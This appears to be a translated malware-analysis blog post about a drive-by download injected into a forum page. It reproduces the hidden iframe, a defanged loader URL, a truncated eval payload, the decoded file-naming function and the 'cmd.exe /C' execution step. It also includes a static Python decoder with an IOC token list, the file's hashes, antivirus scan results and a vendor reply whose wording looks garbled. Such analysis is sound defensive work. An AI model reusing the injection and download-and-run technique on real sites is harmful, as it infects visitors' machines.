down.exe / Virus.Win32.AutoRun.Z / Trojan.PWS.Maran.262



Endurer, original
Version 2: added the reply from Kaspersky.
Version 1

When opening a page on a forum I visit occasionally, Rising warned that the page was trying to download and run a suspicious file.

Searching on Google shows that Google has already flagged it:
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=%E8%BF%98%E7%8F%A0%E5%8C%BA+%E6%97%A7%E9%9B%A8%E6%A5%BC%E6%B8%85%E9%A3%8E%E9%98%81&meta=

Checking the page's source shows that the following has been added to it:
/---
<iframe src=hxxp://i**.x***in**8.info/wm.htm width=1 height=1></iframe>
---/

hxxp://i***.x***in***8.info/wm.htm contains:
/---
<script src=0614.js></script>
---/

hxxp://i**.x**in**8.info/0614.js contains:
/---
eval("\146\165\156\143 ...(omitted)... \146\75\61\73\175")
---/

After two rounds of decoding, the original code is obtained. Its function is to download down.exe and save it under %WINDIR%; the file name is produced by this user-defined function:
/---
// picks a random number below rm4mf and uses it as the name of the .exe
function qk45u3(rm4mf){var m0qnw=window["Math"]["random"]()*rm4mf;return Math.round(m0qnw)+'.exe';}
---/
That is, a name of the form ***.exe, where each * is a digit. The downloaded file is then run via cmd.exe /C.
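A static decoder for the eval("\ooo...") layering described above, added here as an example and not part of the original analysis or of 0614.js. It peels each eval wrapper without executing anything; the two-layer SAMPLE is constructed locally from a payload shaped like the UDF, and _IOC_TOKENS is an assumed analyst list.

```python
import re

# JavaScript string-literal escapes: \xhh, or octal \ooo (three digits only if the first is 0-3).
_ESC = re.compile(r'\\(x[0-9A-Fa-f]{2}|[0-3][0-7]{2}|[0-7]{1,2})')
# One eval("...") wrapper around a double-quoted literal.
_EVAL = re.compile(r'eval\(\s*"((?:[^"\\]|\\.)*)"\s*\)', re.S)
# Tokens worth flagging in the innermost decoded layer (assumed analyst list).
_IOC_TOKENS = ("cmd.exe", "%WINDIR%", ".exe", "ADODB.Stream", "Shell.Application")

def decode_js_escapes(s: str) -> str:
    """Statically decode escape sequences; nothing is evaluated."""
    def repl(m):
        tok = m.group(1)
        return chr(int(tok[1:], 16)) if tok[0] == "x" else chr(int(tok, 8))
    return _ESC.sub(repl, s)

def octal_escape(s: str) -> str:
    """Encode text the way 0614.js was encoded (used here only to build the sample)."""
    return "".join("\\%o" % ord(c) for c in s)

def unwrap_eval_layers(script: str, max_layers: int = 8) -> list:
    """Peel eval("...") wrappers one layer at a time; returns every decoded layer."""
    layers, cur = [], script
    for _ in range(max_layers):
        m = _EVAL.search(cur)
        if not m:
            break
        cur = decode_js_escapes(m.group(1))
        layers.append(cur)
    return layers

def suspicious_tokens(code: str) -> list:
    """Tokens from _IOC_TOKENS present in a decoded layer."""
    return [t for t in _IOC_TOKENS if t in code]

# Constructed sample: two eval layers around a payload shaped like the UDF above
# (the real 0614.js body is not reproduced; the Python "\\\\" is one JS backslash).
INNER = ("function qk45u3(rm4mf){var m0qnw=Math.random()*rm4mf;"
         "return Math.round(m0qnw)+'.exe';}"
         "var cmd='cmd.exe /C '+'%WINDIR%\\\\'+qk45u3(1000);")
LAYER1 = 'eval("' + octal_escape(INNER) + '")'
SAMPLE = 'eval("' + octal_escape(LAYER1) + '")'

if __name__ == "__main__":
    for i, layer in enumerate(unwrap_eval_layers(SAMPLE), 1):
        print("--- layer %d ---\n%s\nflags: %s\n" % (i, layer, suspicious_tokens(layer)))
```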

File: D:/test/down.exe
Attributes: ---
An error occurred while obtaining the file version information!
Created:
Modified:
Accessed:
Size: 19602 bytes, 19.146 KB
MD5: a329a121353d80b9871119788f7b14c7

NsPack 1.3 -> North Star/Liu Xing Ping

File down.exe received at 09:14:12 (CET)
Current status: Completed

Antivirus          Version        Last update   Result
AhnLab-V3          2007.7.28.0    2007.07.27    Win-Trojan/Hupigon.gen
AntiVir            7.4.0.50       2007.07.27    TR/Agent.19602
Authentium         4.93.8         2007.07.27    Possibly a new variant of W32/Threat-HLLIN-Slipper-based!Maximus
Avast              4.7.997.0      2007.07.27    Win32:Small-AMI
AVG                7.5.0.476      2007.07.27    Downloader.Generic5.ECA
BitDefender        7.2            2007.07.28    GenPack:Generic.Malware.WBdld.92022134
CAT-QuickHeal      9.00           2007.07.26    (Suspicious) - DNAScan
ClamAV             0.91           2007.07.28    -
DrWeb              4.33           2007.07.27    Trojan.PWS.Maran.262
eSafe              7.0.15.0       2007.07.24    Suspicious Trojan/Worm
eTrust-Vet         31.1.5010      2007.07.28    -
Ewido              4.0            2007.07.27    -
FileAdvisor        1              2007.07.28    -
Fortinet           2.91.0.0       2007.07.28    -
F-Prot             4.3.2.48       2007.07.27    W32/Threat-HLLIN-Slipper-based!Maximus
F-Secure           6.70.13030.0   2007.07.27    W32/Hupigon.gen67
Ikarus             T3.1.1.8       2007.07.27    Backdoor.Win32.Agent.ahj
Kaspersky          4.0.2.24       2007.07.28    -
McAfee             5085           2007.07.27    -
Microsoft          1.2704         2007.07.28    -
NOD32v2            2426           2007.07.27    a variant of Win32/TrojanDownloader.Delf.NSA
Norman             5.80.02        2007.07.27    W32/Hupigon.gen67
Panda              9.0.0.4        2007.07.28    Generic Trojan
Rising             19.33.42.00    2007.07.27    -
Prevx1             V2             2007.07.28    W32.Malware.gen
Sophos             4.19.0         2007.07.26    Mal/Packer
Sunbelt            2.2.907.0      2007.07.28    VIPRE.Suspicious
Symantec           10             2007.07.28    -
TheHacker          6.1.7.155      2007.07.28    -
VBA32              3.12.2.1       2007.07.27    Malwarw.Trojan-PSW.Game.14
VirusBuster        4.3.26:9       2007.07.27    -
Webwasher-Gateway  6.0.1          2007.07.28    Trojan.Agent.19602

Additional information

File Size: 19602 bytes

MD5: a329a121353d80b9871119788f7b14c7

Sha1: cd849c87c62a23adc01b3d9c1b3c1e5b848faa03

Prevx info: http://fileinfo.prevx.com/fileinfo.asp?px5=cbb0e79992c2fa964c9000f9f5065b00efb6d5a7

Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

Subject: Re: [KLAB-2516758]
From: "" <Newvirus@kaspersky.com>    Sent: 16:16:38

Hello.

Virus.Win32.AutoRun.Z

New malicious software was found in the attached file.

Its detection will be removed in the next update. Thank you for your help.

-----------------

Regards, Yury Nesmachny

Virus analyst, Kaspersky Lab.
